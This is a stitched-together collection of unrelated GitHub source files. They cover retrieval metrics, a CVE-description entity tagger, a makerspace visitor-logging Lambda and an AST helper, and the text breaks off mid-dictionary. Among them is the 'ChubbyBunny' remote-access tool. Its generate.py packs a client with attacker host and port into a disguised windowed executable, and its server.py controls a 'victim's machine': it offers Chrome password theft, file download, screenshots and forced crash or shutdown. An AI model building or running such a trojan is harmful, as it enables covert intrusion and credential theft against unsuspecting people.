#fp = self.false_positives(distances, x_labels, y_labels, k)
fn = self.false_negative(distances, x_labels, y_labels, k)
fp = np.minimum(k - tp, fn)
precision_at_k = tp / (tp + fp)
return precision_at_k
def recall_at_k(self, x, y, x_labels, y_labels, k):
'''
Percentage of total relevant results correctly classified by the algorithm
The ability of a model to find all relevant cases within a dataset.
Recall = true_positives / (true_positives + false_negatives)
        The ability of the model to retrieve a relevant pair from one domain given a query from the other domain
'''
distances = pairwise_distances(x,y,self.metric)
tp = self.true_positives(distances, x_labels, y_labels, k)
fn = self.false_negative(distances, x_labels, y_labels, k)
fn = np.minimum(fn,k-tp)
recall_at_k = tp / (tp + fn)
return recall_at_k
def average_rank_at_k(self, x, y, labels):
rank = self.rank(x,y,labels, labels)
for k in [1,5,10,20,50,100,500,5000]:
percentage = (rank <= k).sum() / x.shape[0]
            print(' Top {}: {:.3f}'.format(k, percentage))
def rank_curve(self, x, y, labels):
rank = self.rank(x,y,labels,labels)
print("Average rank", rank.mean())
count_percentage = np.zeros((x.shape[0]), dtype=float)
for i in range(x.shape[0]):
count_percentage[i] = (rank <= i+1).sum() / x.shape[0]
plt.plot(count_percentage)
plt.show()
plt.waitforbuttonpress()
``` |
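A toy retrieval check for `NumpyMetrics`; the embeddings and labels are random stand-ins for the map and panorama descriptors the model would produce:
```python
import numpy as np
from utils.metrics import NumpyMetrics

rng = np.random.default_rng(0)
n, d = 200, 16
x = rng.normal(size=(n, d))                  # e.g. map-tile embeddings
y = x + 0.05 * rng.normal(size=(n, d))       # panorama embeddings of the same locations, lightly perturbed
labels = np.arange(n)

metrics = NumpyMetrics(metric='euclidean')
rank = metrics.rank(x, y, labels, labels)
print("mean rank:", rank.mean())             # close to 1 when the two sets are well aligned
print("top-1:", (rank <= 1).mean(), "top-5:", (rank <= 5).mean())
print("recall@5:", metrics.recall_at_k(x, y, labels, labels, k=5).mean())
```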
{
"source": "0berry/CVE-analyzer",
"score": 3
} |
#### File: 0berry/CVE-analyzer/annotator.py
```python
import csv
import json
import sys
import re
import en_core_web_lg
def usage():
    print('usage: python annotator.py <path_to_dataset_in_csv> <output_file>')
def _get_annotations(desc, pattern, label):
regex = re.compile(pattern)
return [(match.start(), match.start() + len(match.group()), label) for match in regex.finditer(desc)]
# ------------------- ANNOTATION RULES -------------------
def find_functions(desc):
pattern = r'[a-zA-Z0-9]+(_[a-zA-Z0-9]+)+'
return _get_annotations(desc, pattern, "FUNCTION")
def find_kernel_version(desc):
pattern = r'\d+(\.\d+)+(-?)(\w+)?'
return _get_annotations(desc, pattern, "VERSION")
def find_file_path(desc):
pattern = r'(/)?\w+(/\w+)+\.c'
return _get_annotations(desc, pattern, "SOURCECODE")
def find_fd_driver(desc):
pattern = r'(/)?\w+(/\w+(?!\.c))+'
return _get_annotations(desc, pattern, "DRIVER")
def find_driver(desc):
pattern = r'[a-zA-Z]+\s[a-zA-Z\-]+\s(?=driver)'
return _get_annotations(desc, pattern, "DRIVER")
def find_structs(desc):
pattern = r'(?<=struct\s)\w+(\s\w+)'
return _get_annotations(desc, pattern, "STRUCT")
# ------------------- END ANNOTATION RULES -------------------
TAGGERS = [
find_functions,
find_kernel_version,
find_file_path,
find_driver,
find_structs,
find_fd_driver
]
def annotate_NER(dataset_file):
TRAIN_DATA = []
with open(dataset_file, 'r') as cve_dataset_f:
# cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_dataset_f:
entities = []
for tagger in TAGGERS:
entities += tagger(cve)
TRAIN_DATA += [[cve, {'entities': entities}]]
with open('annotated_{}_NER_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def annotate_DEP(dataset_file):
TRAIN_DATA = []
model = en_core_web_lg.load()
with open(dataset_file, 'r') as cve_dataset_f:
cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_reader:
            tagged_desc = model(str(cve['Avail.']))
heads = [tok.head.i for tok in tagged_desc]
deps = ['-']*len(heads)
TRAIN_DATA += [[cve['Avail.'], {'heads': heads, 'deps': deps}]]
with open('annotated_{}_DEP_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def main(dataset_file):
annotate_NER(dataset_file)
# annotate_DEP(dataset_file)
if __name__ == '__main__':
if len(sys.argv) <= 1:
usage()
sys.exit(0)
main(sys.argv[1])
```
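A quick demonstration of the regex taggers above on a single invented CVE-style description (importing the module requires its spaCy dependency to be installed):
```python
from annotator import TAGGERS

desc = ("The snd_usb_create_streams function in sound/usb/card.c in the Linux kernel "
        "before 4.13.6 allows local users to cause a denial of service.")

entities = []
for tagger in TAGGERS:
    entities += tagger(desc)

# Each entry is (start_offset, end_offset, label); overlaps between rules are possible.
for start, end, label in sorted(entities):
    print(label, repr(desc[start:end]))
```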
#### File: CVE-analyzer/cve_analyzer/analyzer.py
```python
import os
import logging
import json
import random
from pathlib import Path
import spacy
from spacy.util import minibatch, compounding
from collections import defaultdict
log = logging.getLogger('CVE_Analyzer')
# ------------------------ PERFORMANCES ------------------------
def _compute_performances(performaces, annotations, entities):
    predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in entities]
    # Count each span once: a predicted span that matches an annotation is a true
    # positive, a missed annotation is a false negative, and an unmatched prediction
    # is a false positive (iterating over annotations + predictions would count
    # every true positive twice).
    for entry in annotations:
        if entry in predictions:
            performaces["tp"] += 1
        else:
            performaces["fn"] += 1
    for entry in predictions:
        if entry not in annotations:
            performaces["fp"] += 1
def _compute_precision(performaces):
return float(performaces["tp"]) / (performaces["tp"] + performaces["fp"])
def _compute_recall(performaces):
return float(performaces["tp"]) / (performaces["tp"] + performaces["fn"])
def _compute_f_measure(precision, recall):
return 2*precision*recall / (precision + recall)
def _compute_accuracy(performaces):
return float((performaces['tp'] + performaces['tn'])) / \
float((performaces['tp'] + performaces['tn'] + performaces['fp'] + performaces['fn']))
def _get_dataset(dataset_path):
if not os.path.exists(dataset_path):
raise OSError("Dataset file {} not found".format(dataset_path))
with open(dataset_path, 'r') as dataset_f:
dataset = json.load(dataset_f)
return dataset
def _get_ner_component(nlp):
# Add entity recognizer to model if it's not in the pipeline
# nlp.create_pipe works for built-ins that are registered with spaCy
if 'ner' not in nlp.pipe_names:
ner = nlp.create_pipe('ner')
nlp.add_pipe(ner)
# otherwise, get it, so we can add labels to it
else:
ner = nlp.get_pipe('ner')
return ner
# ------------------------ EXPORTED METHODS ------------------------
def get_train_and_test_sets(dataset_file, split_ratio):
dataset = _get_dataset(dataset_file)
random.shuffle(dataset)
split = int(len(dataset)*split_ratio)
return dataset[:split], dataset[split:]
def pp_performances(accuracy, precision, recall, f_measure):
print("\n-------------------------------------------")
print("PERFORMANCES:")
print("\nAccuracy: {}".format(accuracy))
print("Precision: {}".format(precision))
print("Recall: {}".format(recall))
print("F-measure: {}".format(f_measure))
print("\n-------------------------------------------")
def save_model(output_dir, model_name, nlp):
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir(parents=True, exist_ok=True)
nlp.meta['name'] = model_name
nlp.to_disk(output_dir)
log.debug("Saved model to %s", output_dir)
def get_model(model_path):
return spacy.load(model_path)
def test(nlp, testset):
performances = {
"tp": 0,
"fp": 0,
"fn": 0,
"tn": 0
}
for description, annotations in testset:
doc = nlp(description)
_compute_performances(performances, annotations['entities'], doc.ents)
performances['accuracy'] = _compute_accuracy(performances)
performances['precision'] = _compute_precision(performances)
performances['recall'] = _compute_recall(performances)
performances['f_measure'] = _compute_f_measure(performances['precision'], performances['recall'])
return performances
def train(trainset, labels, n_iter, drop_rate):
nlp = spacy.blank('en')
ner = _get_ner_component(nlp)
for label in labels:
ner.add_label(label)
optimizer = nlp.begin_training()
# get names of other pipes to disable them during training
other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']
with nlp.disable_pipes(*other_pipes): # only train NER
for _ in range(n_iter):
random.shuffle(trainset)
losses = {}
# batch up the examples using spaCy's minibatch
batches = minibatch(trainset, size=compounding(4., 32., 1.001))
for batch in batches:
texts, annotations = zip(*batch)
nlp.update(texts, annotations, sgd=optimizer, drop=drop_rate, losses=losses)
log.debug('Losses %r', losses)
return nlp
def get_prediction_for_description(nlp, description):
doc = nlp(description)
raw_predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in doc.ents]
formatted_prediction = defaultdict(list)
for (start_idx, end_idx, label) in raw_predictions:
formatted_prediction[label].append(description[start_idx: end_idx])
return formatted_prediction
def get_default_model():
return spacy.load(os.path.join(os.path.dirname(__file__), 'model'))
def get_default_dataset():
return _get_dataset(os.path.join(os.path.dirname(__file__), 'dataset/dataset.json'))
```
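A hedged end-to-end sketch for the helpers above: train a blank NER model on an annotated CVE dataset and report the metrics. The label names follow `annotator.py`; the dataset path, output directory and hyper-parameters are illustrative only:
```python
from cve_analyzer.analyzer import (get_train_and_test_sets, train, test,
                                   pp_performances, save_model,
                                   get_prediction_for_description)

LABELS = ["FUNCTION", "VERSION", "SOURCECODE", "DRIVER", "STRUCT"]

trainset, testset = get_train_and_test_sets("annotated_dataset_NER_train.json", split_ratio=0.8)
nlp = train(trainset, LABELS, n_iter=20, drop_rate=0.35)

perf = test(nlp, testset)
pp_performances(perf['accuracy'], perf['precision'], perf['recall'], perf['f_measure'])

save_model("output_model", "cve_ner", nlp)
print(get_prediction_for_description(nlp, "Buffer overflow in net/ipv4/tcp_input.c in the Linux kernel before 4.9.2"))
```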
#### File: trainer/server/uploader.py
```python
import csv
import sys
import requests
API_ENDPOINT = 'http://127.0.0.1:5000'
def usage():
print('usage: python uploader.py <path_to_csv_file>')
def main(csv_path):
with open(csv_path, 'r') as csv_f:
data = csv.DictReader(csv_f, delimiter='\t')
for cve in data:
response = requests.post(
API_ENDPOINT + "/postNewCve",
params={"cve_id": cve['CVE ID'], "cve_description": cve['Descr.']}
)
if response.status_code != 200:
print("Error during post of {}".format(cve['CVE ID']))
else:
print("Successfully posted {}".format(cve['CVE ID']))
if __name__ == '__main__':
if len(sys.argv) != 2:
usage()
sys.exit(-1)
main(sys.argv[1])
``` |
{
"source": "0BL1V10N-V01D/ChubbyBunny",
"score": 3
} |
#### File: 0BL1V10N-V01D/ChubbyBunny/generate.py
```python
import subprocess
from shutil import copyfile
import os
import socket
import base64
import sys
import pickle
import time
GREEN = '\33[32m'
RED = '\33[31m'
END = '\33[0m'
BOLD = '\33[1m'
#print(GREEN + BOLD + "\nThis isn't set up yet! Very soon... Please use the 'client.py' with the github instructions instead.\n" + END)
print(' ')
host = input(GREEN + BOLD + 'Set LHOST IP: ' + END)
port = input(GREEN + BOLD + 'Set LPORT: ' + END)
name = input(GREEN + BOLD + 'Enter the basename for output files: ' + END)
def createFile():
try:
global copiedFile
print(GREEN + BOLD + '\nCreating python file...\n')
time.sleep(2)
exampleFile = os.getcwd() + '/source/example.py'
copiedFile = os.getcwd() + '/output/' + name + '.py'
copyfile(exampleFile, copiedFile)
with open(copiedFile, 'r') as file:
filedata = file.read()
replaceHOST = "host = '" + host + "'"
filedata = filedata.replace("host = ''", replaceHOST)
with open(copiedFile, 'w') as file:
file.write(filedata)
with open(copiedFile, 'r') as file:
filedata = file.read()
replacePORT = "port = " + port
filedata = filedata.replace("port = ''", replacePORT)
with open(copiedFile, 'w') as file:
file.write(filedata)
except:
print(RED + BOLD + "Couldn't create python file. Quitting...")
sys.exit()
def pythonToExe():
try:
        ico = input('\n' + GREEN + BOLD + 'Path to icon file: ' + END)
print(GREEN + BOLD + '\nGenerating exe file...\n')
p = subprocess.Popen(['pyinstaller', '-y', '-F', '-w', '-i', ico, '-n', name, copiedFile], cwd = 'output/')
p.wait()
except:
print(RED + BOLD + "Couldn't create exe file. Quitting...")
sys.exit()
def done():
time.sleep(2)
print(GREEN + BOLD + "\nDone! Saved to the 'dist' directory in the output folder!")
time.sleep(2)
def main():
createFile()
pythonToExe()
done()
if __name__ == "__main__":
main()
```
#### File: 0BL1V10N-V01D/ChubbyBunny/server.py
```python
import socket
import subprocess
import sys
import os
import time
import signal
import readline
import pickle
import struct
import base64
from io import StringIO, BytesIO
import base64
from PIL import Image
import datetime
subprocess.call(['clear'])
GREEN = '\33[32m'
RED = '\33[31m'
YELLOW = '\33[33m'
CYAN = '\033[1;36m'
VIOLET = '\33[35m'
BLUE = '\33[34m'
END = '\33[0m'
BOLD = '\33[1m'
CURL = '\33[4m'
restarting = (YELLOW + BOLD + '\n[!] Trying to restart... ' + END)
restartTerminal = (YELLOW + BOLD + '[!] Sometimes restarting the terminal may help... ' + END)
failed = (RED + BOLD + '[!] Failed!' + END)
def signal_handler(sig, frame):
print(RED + BOLD + '\n\nQuitting...\n' + END)
sys.exit(0)
def printBanner():
print(BLUE + BOLD + ' ____ ____')
print(" /' | | \\")
print(' / / | | \ \\')
print(' / / | | | \ \\')
print(' ( / | """" |\ \ ' + END + BOLD + ' Ahhh HA!!!')
print(BLUE + BOLD + ' | / / /^\ /^\ \ _| ' + END + BOLD + ' I love big big carrot!!!')
print(BLUE + BOLD + ' ~ | | | | | | ~')
print(' | |__' + END + BOLD + 'O' + BLUE + BOLD + '|__|' + END + BOLD + 'O' + BLUE + BOLD + '__| |')
print(' /~~ \/ ~~\\')
print(' / ( | ) \\')
print(" _--_ /, \____/^\___/' \ _--_")
print(' /~ ~\ / -____-|_|_|-____-\ /~ ~\\')
print(' /________|___/~~~~\___/~~~~\ __|________\\')
print('--~~~ ^ | | | | - : ~~~~~:~-_ ___-----~~~~~~~~|')
print(" / `^-^-^' `^-^-^' : ~\ /' ____/--------|")
print(' ; : : |----------/--------|')
print(': , ' + VIOLET + BOLD + 'ChubbyListener:' + RED + BOLD + ' v1.0.0' + BLUE + BOLD + ' ; . |---\\--------------|')
print(' : - ' + VIOLET + BOLD + 'Writen by:' + RED + BOLD + ' 0BL1V10N V01D' + BLUE + BOLD + ' . : : |______________-__|')
print(" : , , : /'~----___________|")
print('__ \\\ ^ ,, ;; ;; ;._-~')
print(' ~~~-----____________________________________----~~~')
def socketCreate():
try:
global host
global port
global showPort
global s
host = input(GREEN + BOLD + '\nSet LHOST: ' + END)
port = input('\n' + GREEN + BOLD + 'Set LPORT: ' + END)
port = int(port)
showPort = str(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print(failed)
def socketBind():
try:
s.bind((host, port))
except socket.error:
print(failed)
print(restarting)
print(restartTerminal)
subprocess.call(['clear'])
socketBind()
def listening():
s.listen(1)
print(GREEN + BOLD + '\n[*] Listening on ' + END + CYAN + host + ':' + showPort + END)
def socketAccept():
global conn
global addr
    conn, addr = s.accept()
print(GREEN + BOLD + '\n[*] Session opened at ' + END + CYAN + addr[0] + ':' + str(addr[1]) + '\n' + END)
sendCommands(conn)
def sendCommands(conn):
while True:
cmd = input(CYAN + str(addr[0]) + ':' + str(addr[1]) + ' > ' + END)
if cmd == 'quit':
conn.close()
s.close()
sys.exit()
elif cmd == 'exit':
conn.close()
s.close()
sys.exit()
elif cmd == 'help':
print(' ')
print('Help Commands')
print('=============')
print(' ')
print('Commands Description')
print('-------- -----------')
print('quit Exit script')
print('exit Quit script')
print('sysinfo View basic client information')
print('screenshot Take a screenshot of machine')
print('download -s Download screenshot to your computer')
print("download -f [file] Download a .txt file from victim's machine")
print("download -c Download saved password chrome file")
print("openurl [url] Open a url page in the victim's machine")
print("chrome Attempt to retrieve saved chrome passwords")
print('memory Print phyiscal and virtual memory')
print('crash Attempt to crash computer')
print('lock Lock computer screen')
print('shutdown Shutdown computer')
print('restart Restart computer')
print(' ')
elif cmd == 'sysinfo':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'clear':
subprocess.call(['clear'])
elif cmd == '':
pass
elif cmd == 'shutdown':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'restart':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'memory':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), 'utf-8')
print(clientResponse)
print(' ')
elif cmd[:7] == 'openurl':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd == 'crash':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print(clientResponse)
elif cmd[:4] == 'lock':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print('\n' + clientResponse, end="")
elif cmd[:11] == 'download -f':
try:
conn.send(str.encode(cmd))
print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END)
print(YELLOW + "[!] Recommended download size is no more than 3GBs! ")
filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN)
file = open('downloads/' + filename, 'wb')
file_data = conn.recv(1024)
print(GREEN + BOLD + '\n' + '[*] Downloading...' + END)
file.write(file_data)
file.close()
print(GREEN + BOLD + '[*] Downloaded successfully to downloads/' + filename + END)
except:
print(RED + BOLD + '[!] There was an error downloading your file.' + END)
pass
elif cmd == 'screenshot':
conn.send(str.encode(cmd))
clientResponse = str(conn.recv(1024), "utf-8")
print('\n' + clientResponse, end='')
elif cmd == 'download -s':
print(' ')
print(GREEN + BOLD + '[*] Transfering screenshot... This can take up to 20 seconds...' + END)
conn.send(str.encode(cmd))
data = b""
payload_size = struct.calcsize(">L")
#print("payload_size: {}".format(payload_size))
while len(data) < payload_size:
#print("Recv: {}".format(len(data)))
data += conn.recv(8192)
#print("Done Recv: {}".format(len(data)))
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
#print("msg_size: {}".format(msg_size))
while len(data) < msg_size:
data += conn.recv(8192)
frame_data = data[:msg_size]
data = data[msg_size:]
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = base64.b64decode(frame)
img = Image.open(BytesIO(frame))
imgname = 'downloads/screenshot' + str(datetime.datetime.now()) + '.png'
img.save(imgname)
print(GREEN + BOLD + '[*] Screenshot output in ' + END + CYAN + imgname + END)
print(' ')
elif cmd == 'chrome':
conn.send(str.encode(cmd))
print('')
print(GREEN + BOLD + "[*] Type 'download', let's see if this worked!")
print('')
elif cmd == 'download -c':
try:
conn.send(str.encode(cmd))
print('\n' + YELLOW + "[!] Please use this for 'txt' or other document file transfers. Use 'download -s' to transfer a taken screenshot. Type Q to quit." + END)
print(YELLOW + "[!] Recommended download size is no more than 3GBs! ")
filename = input('\n' + CYAN + '[*] Please enter a filename for the incoming file: ' + END + GREEN)
file = open(filename, 'wb')
file_data = conn.recv(1024)
print(GREEN + BOLD + '\n' + '[*] Downloading...' + END)
file.write(file_data)
file.close()
print(GREEN + BOLD + '[*] Downloaded successfully to ' + filename + END + '\n')
except:
print(RED + BOLD + '[!] There was an error downloading your file (Error is in server source code).' + END + '\n')
pass
def main():
signal.signal(signal.SIGINT, signal_handler)
printBanner()
socketCreate()
socketBind()
listening()
socketAccept()
if __name__ == '__main__':
main()
```
{
"source": "0brandy0/unified-makerspace-1",
"score": 2
} |
#### File: lambda_code/log_visit/log_visit.py
```python
import json
import datetime
from pydoc import cli
import boto3
from boto3.dynamodb.conditions import Key
from botocore.exceptions import ClientError
import logging
import traceback
import sys
import os
import re
class LogVisitFunction():
"""
This function will be used to wrap the functionality of the lambda
so we can more easily test with pytest.
"""
def __init__(self, table, ses_client):
self.logger = logging.getLogger()
self.logger.setLevel(logging.INFO)
if table is None:
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Get the table name.
TABLE_NAME = os.environ["TABLE_NAME"]
# Get table objects
self.visits = dynamodb.Table(TABLE_NAME)
else:
self.visits = table
if ses_client is None:
AWS_REGION = os.environ['AWS_REGION']
self.client = boto3.client('ses', region_name=AWS_REGION)
else:
self.client = ses_client
def checkRegistration(self, current_user):
response = self.visits.query(
KeyConditionExpression=Key('PK').eq(current_user)
)
return response['Count']
# This code was written following the example from:
# https://docs.aws.amazon.com/ses/latest/DeveloperGuide/send-using-sdk-python.html
def registrationWorkflow(self, current_user):
# This address must be verified with Amazon SES.
SENDER = "<EMAIL>"
email_regex = re.compile(r"[^@]+@[^@]+\.[^@]+")
if not email_regex.match(current_user):
current_user = current_user + "@clemson.edu"
RECIPIENT = current_user
# One could consider using a configuration set here.
# To learn more about them please visit:
# https://docs.aws.amazon.com/ses/latest/DeveloperGuide/using-configuration-sets.html
SUBJECT = "Clemson University Makerspace Registration"
BODY_TEXT = ("Hello " + current_user + ",\n"
"Our records indicate that you have not registered as an existing user.\n"
"Please go to visit.cumaker.space/register to register as an existing user.\n"
)
# The character encoding for the email.
CHARSET = "UTF-8"
# Create a new SES resource and specify a region.
# Try to send the email.
try:
response = self.client.send_email(
Destination={
'ToAddresses': [
RECIPIENT,
],
},
Message={
'Body': {
'Text': {
'Charset': CHARSET,
'Data': BODY_TEXT,
},
},
'Subject': {
'Charset': CHARSET,
'Data': SUBJECT,
},
},
ReplyToAddresses=["<EMAIL>"],
Source=SENDER,
# If we were using a configuration set we would need the following line.
# ConfigurationSetName=CONFIGURATION_SET,
)
# Display an error if something goes wrong.
except ClientError as e:
self.logger.error(e.response['Error']['Message'])
def addVisitEntry(self, current_user, location):
# Get the current date at which the user logs in.
visit_date = datetime.datetime.now().timestamp()
# Add the item to the table.
response = self.visits.put_item(
# PK = Partition Key = Visit Date
# SK = Sort Key = Username or Email Address
Item={
'PK': str(visit_date),
'SK': current_user,
'location': location,
},
)
return response['ResponseMetadata']['HTTPStatusCode']
def handle_log_visit_request(self, request, context):
"""
Log the input of a user (namely, the username) from the makerspace console.
This should:
1. Check whether this user has visited before by looking for a
sentinel record in the table
2. Trigger a registration workflow if this is the first time for that user
3. Place a visit entry into the table
"""
# return client error if no string params
HEADERS = {
'Content-Type': 'application/json',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"],
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
}
if (request is None):
return {
'headers': HEADERS,
'statusCode': 400,
'body': json.dumps({
"Message": "Failed to provide parameters"
})
}
try:
# Get the username from the request body.
username = json.loads(request["body"])["username"]
location = ' '
try:
location = json.loads(request["body"])["location"]
except Exception as e:
exception_type, exception_value, exception_traceback = sys.exc_info()
traceback_string = traceback.format_exception(
exception_type, exception_value, exception_traceback)
err_msg = json.dumps({
"errorType": "MissingParameter",
"errorMessage": "Missing parameter: location",
"errorTrace": traceback_string
})
self.logger.warn(err_msg)
# Check if this user has registered before.
registration = self.checkRegistration(username)
# If the user is not in the system, send a registration link.
if registration == 0:
self.registrationWorkflow(username)
# One could consider setting res = some other number here in order to
# bring up a page That lets the user know in order to sign in they
# have to check their email and register with the Makerspace.
# Call Function
res = self.addVisitEntry(username, location)
# Send response
return {
'headers': HEADERS,
'statusCode': res
}
except Exception as e:
# Return exception with response
return {
'headers': HEADERS,
'statusCode': 500,
'body': json.dumps({
'Message': str(e)
})
}
log_visit_function = LogVisitFunction(None, None)
def handler(request, context):
# This will be hit in prod, and will connect to the stood-up dynamodb
# and Simple Email Service clients.
return log_visit_function.handle_log_visit_request(request, context)
```
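The constructor above deliberately accepts `table` and `ses_client` so the handler can be exercised without AWS. A minimal sketch of that idea with hand-rolled fakes; the import path, the fake classes, and the sample event are assumptions for illustration, not part of the repo:
```python
import json
import os
# The module builds a default LogVisitFunction(None, None) at import time,
# so these environment variables must exist before the import below.
os.environ.setdefault("TABLE_NAME", "visits")
os.environ.setdefault("AWS_REGION", "us-east-1")
os.environ.setdefault("AWS_DEFAULT_REGION", "us-east-1")
os.environ.setdefault("DOMAIN_NAME", "https://visit.example.org")
from log_visit import LogVisitFunction  # assumed import path for the file above
class FakeTable:
    """Hand-rolled stand-in for the DynamoDB Table resource."""
    def query(self, **kwargs):
        return {"Count": 1}  # pretend the user has already registered
    def put_item(self, Item):
        return {"ResponseMetadata": {"HTTPStatusCode": 200}}
class FakeSES:
    """Stand-in for the SES client; never sends mail."""
    def send_email(self, **kwargs):
        return {"MessageId": "fake"}
fn = LogVisitFunction(FakeTable(), FakeSES())
event = {"body": json.dumps({"username": "jdoe", "location": "main"})}
print(fn.handle_log_visit_request(event, None))  # expect statusCode 200
```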
#### File: lambda_code/register_user/register_user.py
```python
import json
import boto3
from boto3.dynamodb.conditions import Key
import os
import datetime
class RegisterUserFunction():
"""
This class wraps the function of the lambda so we can more easily test
it with moto. In production, we will continue to pass the stood-up
dynamodb table to the handler itself. However, when initializing this class,
we can choose to instead initialize it with a mocked version of the
dynamodb table.
"""
def __init__(self, table):
if table is None:
# Default Behavior in Prod
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Get the table name.
TABLE_NAME = os.environ["TABLE_NAME"]
# Get table objects
self.users = dynamodb.Table(TABLE_NAME)
else:
self.users = table
def addUserInfo(self, user_info):
# Get the current date at which the user registers.
timestamp = datetime.datetime.now()
response = self.users.put_item(
Item={
'PK': user_info['username'],
'SK': str(timestamp),
'firstName': user_info['firstName'],
'lastName': user_info['lastName'],
'Gender': user_info['Gender'],
'DOB': user_info['DOB'],
'Grad_date': user_info['Grad_Date'],
'Major': ', '.join(sorted(user_info['Major'])),
'Minor': ', '.join(sorted(user_info.get('Minor', [])))
},
)
return response['ResponseMetadata']['HTTPStatusCode']
def handle_register_user_request(self, request, context):
HEADERS = {
'Content-Type': 'application/json',
'Access-Control-Allow-Headers': 'Content-Type',
'Access-Control-Allow-Origin': os.environ["DOMAIN_NAME"],
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
}
if (request is None):
return {
'headers': HEADERS,
'statusCode': 400,
'body': json.dumps({
"Message": "Failed to provide parameters"
})
}
# Get all of the user information from the json file
user_info = json.loads(request["body"])
# Call Function
response = self.addUserInfo(user_info)
# Send response
return {
'headers': HEADERS,
'statusCode': response
}
register_user_function = RegisterUserFunction(None)
def handler(request, context):
# Register user information from the makerspace/register console
# Since this will be hit in prod, it will go ahead and hit our prod
# dynamodb table
return register_user_function.handle_register_user_request(
request, context)
```
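The body that `addUserInfo` expects can be read off the keys it accesses; a hypothetical example payload (all field values invented):
```python
import json
# hypothetical payload; the keys mirror what addUserInfo reads from the body
example_event = {
    "body": json.dumps({
        "username": "jdoe",
        "firstName": "Jane",
        "lastName": "Doe",
        "Gender": "F",
        "DOB": "2000-01-31",
        "Grad_Date": "2024-05-01",
        "Major": ["Computer Science"],
        "Minor": ["Mathematics"],   # optional; .get('Minor', []) tolerates omission
    })
}
print(json.loads(example_event["body"])["username"])   # jdoe
```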
{
"source": "0bserver07/neural-engineers-first-attempt",
"score": 3
} |
#### File: load_d2c_data/_ast_final/final_short.py
```python
'''AbstractProgramSet class design from https://github.com/mokemokechicken/keras_npi'''
'''Star takes/transforms multiple parameters as/into a list, passing no parameters to star results in "[]" '''
'''Question Mark takes/transforms multiple parameters as/into a tuple, passing no parameters to question mark results in "None" '''
'''No ?/* takes exactly one argument'''
import string
import ast
from ast import *
from astmonkey import visitors, transformers
import re
import numpy as np
import collections
from collections import OrderedDict
class Program:
output_to_env = False
def __init__(self, name, *args):
self.name = name
self.args = args
#print self.args
self.program_id = None
'''self.variadic_args = [list containing names of which arguments are variadic (can be None if None are variadic)]'''
def description_with_args(self, args):
int_args = args.decode_all()
return "%s(%s)" % (self.name, ", ".join([str(x) for x in int_args]))
def to_one_hot(self, size, dtype=np.float):
ret = np.zeros((size,), dtype=dtype)
ret[self.program_id] = 1
return ret
def do(self, env, args):
raise NotImplementedError()
def __str__(self):
'''
return "<Program: name=%s>" % self.name
'''
return self.name
class AbstractProgramSet:
def __init__(self):
self.program_map = {}
self.program_id = 0
def register(self, pg):
pg.program_id = self.program_id
self.program_map[pg.program_id] = pg
self.program_id += 1
def create_and_register_all(self, all_pgs_in_class):
for i in all_pgs_in_class:
self.register(Program(i, *all_pgs_in_class[i]))
def get(self, i):
return self.program_map.get(i)
def get_arguments(self, i):
return self.program_map.get(i).args
mod_dict = {"Module": ['stmt* body'],
"Interactive": ['stmt* body'],
"Expression": ['expr body'],
"Suite": ['stmt* body'],
}
stmt_dict = {"FunctionDef": ['identifier name', 'arguments args', 'stmt* body', 'expr* decorator_list'],
"ClassDef": ['identifier name', 'expr* bases', 'stmt* body', 'expr* decorator_list'],
"Return": ['expr? value'],
"Delete": ['expr* targets'],
"Assign": ['expr* targets', 'expr value'],
"AugAssign": ['expr target', 'operator op', 'expr value'],
"Print": ['expr? dest', 'expr* values', 'bool nl'],
"For": ['expr target', 'expr iter', 'stmt* body', 'stmt* orelse'],
"While": ['expr test', 'stmt* body', 'stmt* orelse'],
"If": ['expr test', 'stmt* body', 'stmt* orelse'],
"With": ['expr context_expr', 'expr? optional_vars', 'stmt* body'],
"Raise": ['expr? type', 'expr? inst', 'expr? tback'],
"TryExcept": ['stmt* body', 'excepthandler* handlers', 'stmt* orelse'],
"TryFinally": ['stmt* body', 'stmt* finalbody'],
"Assert": ['expr test', 'expr? msg'],
"Import": ['alias* names'],
"ImportFrom": ['identifier? module', 'alias* names', 'int? level'],
"Exec": ['expr body', 'expr? globals', 'expr? locals'],
"Global": ['identifier* names'],
"Expr": ['expr value'],
"Pass": [],
"Break": [],
#"attributes": ['int lineno', 'int col_offset'],
}
expr_dict = {"BoolOp": ['boolop op', 'expr* values'],
"BinOp": ['expr left', 'operator op', 'expr right'],
"UnaryOp": ['unaryop op', 'expr operand'],
"Lambda": ['arguments args', 'expr body'],
"IfExp": ['expr test', 'expr body', 'expr orelse'],
"Dict": ['expr* keys', 'expr* values'],
"Set": ['expr* elts'],
"ListComp": ['expr elt', 'comprehension* generators'],
